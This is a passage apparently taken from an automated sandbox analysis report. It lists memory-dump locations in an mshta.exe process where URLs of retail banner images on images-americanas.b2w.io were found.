Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/05/12/espacamento-10-d905af122871.png
Source: mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/05/12/espacamento-10-d905af122871.pnghttps://image
Source: mshta.exe, 00000000.00000003.2670798916.0000000006ED4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A904000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748034689.000000000A901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751923492.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743961553.00000000092B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-LEVE_PAGUE-1678818a0085
Source: mshta.exe, 00000000.00000003.2670798916.0000000006ED4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751960623.0000000006EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717099166.0000000009A8C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764767166.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751923492.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769702156.0000000006EF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OBACUPOM-2e7e4e4c39b5.p
Source: mshta.exe, 00000000.00000003.2670798916.0000000006ED4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A904000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748034689.000000000A901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751923492.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555a
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765522247.0000000003342000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-ELETROPORTATEIS-bfaadadd69a1.p
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773869837.000000000A850000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png2400c3.
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngy
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751960623.0000000006EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngng
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png%
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png=
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665760319.0000000009367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png
